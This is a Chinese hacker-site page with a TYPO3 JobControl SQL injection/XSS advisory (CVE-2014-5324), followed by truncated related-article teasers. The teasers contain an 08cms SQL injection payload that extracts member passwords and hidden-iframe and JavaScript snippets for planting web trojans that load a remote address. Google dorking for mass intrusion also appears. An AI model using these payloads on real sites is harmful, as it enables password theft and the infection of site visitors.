TYPO3 JobControl SQL注入及跨站脚本漏洞 -中国寒龙

受影响系统:
TYPO3 JobControl
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 70145
CVE(CAN) ID: CVE-2014-5324

Typo3是开源内容管理系统(CMS)和内容管理框架(CMF)。

TYPO3 JobControl 2.14.0版本及之前版本在实现上存在SQL注入及跨站脚本漏洞,攻击者可利用此漏洞窃取cookie身份验证凭证,执行未授权数据库操作。

<*来源:Yuji Tounai
*>

建议:
--------------------------------------------------------------------------------
厂商补丁:

TYPO3
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://typo3.org/extensions/repository/view/dmmjobcontrol

时间: 2024-10-12 04:31:35

TYPO3 JobControl SQL注入及跨站脚本漏洞 -中国寒龙的相关文章

最新xdcms企业管理系统0day漏洞-中国寒龙病毒联盟

最新版XDCMS企业管理系统,由于过滤不严,可绕过限制,导致多处SQL注入 注入在XDCMS企业管理系统的注册功能处,来看看\system\modules\member\index.php文件: 注册时会调用register_save,问题就出在index.php的register_save函数处: publicfunction register_save(){ $username=safe_html($_POST['username']);//获取UserName,这里用safe_html函数

08cms家园系统源码注入漏洞 -中国寒龙出品

# Title :08cms家园系统注入漏洞# Team :08 Security Team# Author :08安全团队# 首发 : 08安全团队#######################################这个漏洞在5月份已经审计出来了,现在将漏洞放出来.注册一个账号 会员资料->基本资料 查看表单得到自己的 MID在真实姓名 填写 \头像填写 1 ,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members l

Cisco IOS及IOS XE Software DHCPv6拒绝服务漏洞 -中国寒龙出品

受影响系统:Cisco IOS 15.xCisco IOS XE 3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70140CVE(CAN) ID: CVE-2014-3359 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4.IOS XE 3.3.xSE,

Cisco IOS拒绝服务漏洞 -中国寒龙出品

受影响系统:Cisco IOS 15.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70129CVE(CAN) ID: CVE-2014-3361 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4没有正确通过NAT实现SIP,在实现上存在远程拒绝服务漏洞,攻击

Juniper JunosE拒绝服务漏洞 -中国寒龙

受影响系统:Juniper Networks JUNOSe描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70369CVE(CAN) ID: CVE-2014-6380 JunosE是用在Juniper E系列路由器内的操作系统. Juniper JunosE处理构造的碎片数据包时存在拒绝服务漏洞,可导致FPC重置或断网. <*来源:vendor*> 建

Cisco IOS及IOS XE Software多个DNS拒绝服务漏洞 -中国寒龙

受影响系统:Cisco IOS 15.xCisco IOS XE 3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70132CVE(CAN) ID: CVE-2014-3357 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4.IOS XE 3.3.xSE,

中国寒龙博客www.hackerschina.org:代码审计:PHP中is_numeric函数十六进制绕过BUG 发生的安全问题有哪些?

0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE. 0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全. $s = is_numeric($_GET['s'])?$_GET['s']:0; $sql="insert into test(type)values($s);";//是 values($

利用谷歌实现批量入侵的方法 -中国寒龙

route print 查看本机设置网络 intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似. ca

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR